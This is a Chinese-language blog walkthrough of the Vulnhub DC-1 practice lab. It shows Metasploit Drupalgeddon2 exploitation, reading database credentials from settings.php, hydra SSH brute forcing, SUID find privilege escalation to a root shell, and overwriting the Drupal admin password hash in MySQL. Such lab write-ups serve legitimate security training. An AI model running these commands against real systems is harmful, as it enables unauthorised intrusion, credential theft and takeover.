Vulnhub靶机:DC-1

标签Drupal CMSCVE-2018-7600drupal_drupalgeddon2漏洞linux提权

0x00 环境准备

下载地址:https://www.vulnhub.com/entry/dc-1,292/
flag数量:5
攻击机:kali
攻击机地址:192.168.5.4
靶机描述:

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

0x01 信息搜集

1.探测靶机地址

命令:arp-scan -l

靶机地址是192.168.5.5

2.探测靶机开放端口

命令:nmap -sV -p- 192.168.5.5

目前来看,可以做的事有:①尝试爆破SSH弱口令。②从80端口找web漏洞。
先看一下80端口吧。

发现是Drupal CMS

0x02 drupal_drupalgeddon2漏洞

通过查询发现,该版本下存在许多漏洞,包括sql注入,远程命令执行等,打开msf看一下有没有利用脚本。

root@locahost:~# msfconsole
msf5 > search drupal

使用exploit/unix/webapp/drupal_drupalgeddon2漏洞攻击,因为它时间比较新,而且rankexcellent

msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > show options(查看需要设置哪些参数)
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.5.5
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

利用成功了:

使用shell命令,进入到靶机命令行
meterpreter > shell

使用ls命令,可以看到当前目录有一个flag1.txt文件,使用cat命令查看

这应该是一个提示,那就看一下它的配置文件,百度一下目录结构。

看一下./sites/default/settings.php文件里有没有flag

这里发现了flag2提示,并且还看到了数据库的用户名和密码dbuser \ R0ck3t。这里的提示大概意思是“蛮力和字典攻击并不是获得访问权限的唯一方法”。这里的提示没有什么思路,先看一下/etc/passwd文件吧。

passwd文件存放在/etc目录下。这个文件存放着所有用户帐号的信息,包括用户名和密码。Passwd文件由许多条记录组成,每条记录占一行,记录了一个用户帐号的所有信息。每条记录由7个字段组成,字段间用冒号“:”隔开,其格式如下:username:password:User ID:Group ID:comment:home directory:shell

0x03 hydra爆破SSH

这里有个用户名为flag4的用户,之前扫描端口的时候靶机还开着22端口,尝试使用hydra爆破22端口。这里的字典使用的是kali自带的字典,kali默认密码字典在/usr/share/wordlists/目录下。
命令:hydra -l flag4 -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 50 ssh://192.168.5.5

-l 单个用户名,大写是用户名文件
-P 密码文件,小写是单个密码
-t 设置线程数

可以看到爆破出来了flag4 \ orange,登录一下看看:
命令:ssh flag4@192.168.5.5

0x04 提权

ls看一下当前目录,发现了flag4.txt文件,cat查看,给的提示大概意思是“你能用同样的方法找到root的flag吗?”。应该是要我们提权到root。
linux下的提权我还没试过,就去找了一下大佬们的教程,所以这里我就不细说了,我会把文章里用到的所有链接都贴到结尾。下面开始提权。
以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试。

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;

这里只有第一个命令可以执行,第二个和第三个都不行,所以就用第一个。
接下来随便找一个命令进行利用,我们就用find,先查看其信息,发现其确实是root用户权限的SUID的文件。
命令:ls -lh /usr/bin/find

创建一个文件夹:touch getflag
执行命令:find / -type f -name getflag -exec "whoami" \;

可以看到现在的身份是root了
执行命令:

find / -type f -name getflag -exec "/bin/sh" \;
cd /root
ls

进入到root目录下发现了thefinalflag.txt,也就是最后一个flag,那flag3去哪了?

0x05 遗漏的flag3

回想一下刚才得到的信息还有哪里没有用到,刚才在配置文件中看到了数据库的账号密码,那我们去数据中看一下是不是藏着flag3。
命令:mysql -udbuser -p
输入密码进入到数据库,数据库命令后面一定要加分号。
查看数据库:show databases;
使用指定数据库:use drupaldb;

查看当前库下的数据表:show tables;
并没有看到flag3的踪影,那就看一user表吧,拿个admin账号密码去登录一下web系统。

命令:select * from users;

woc,这密码的加密方式让我一脸懵逼,那就试一下修改admin密码吧,在网上找到了修改语句update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4' where name='admin';。现在admin的账号密码就是admin \ password了。

成功登录,在dashboard中找到了flag3。

截止到这里,5个flag就已经全部找到了。

由于我不会每天都登录简书,所以有什么私信或者评论我都不能及时回复,如果想要联系我最好给我发邮件,邮箱:Z2djMjUxMTBAMTYzLmNvbQ==,如果发邮件请备注“简书”

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 215,539评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,911评论 3 391
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 161,337评论 0 351
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,723评论 1 290
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,795评论 6 388
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,762评论 1 294
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,742评论 3 416
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,508评论 0 271
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,954评论 1 308
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,247评论 2 331
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,404评论 1 345
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 35,104评论 5 340
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,736评论 3 324
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,352评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,557评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,371评论 2 368
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,292评论 2 352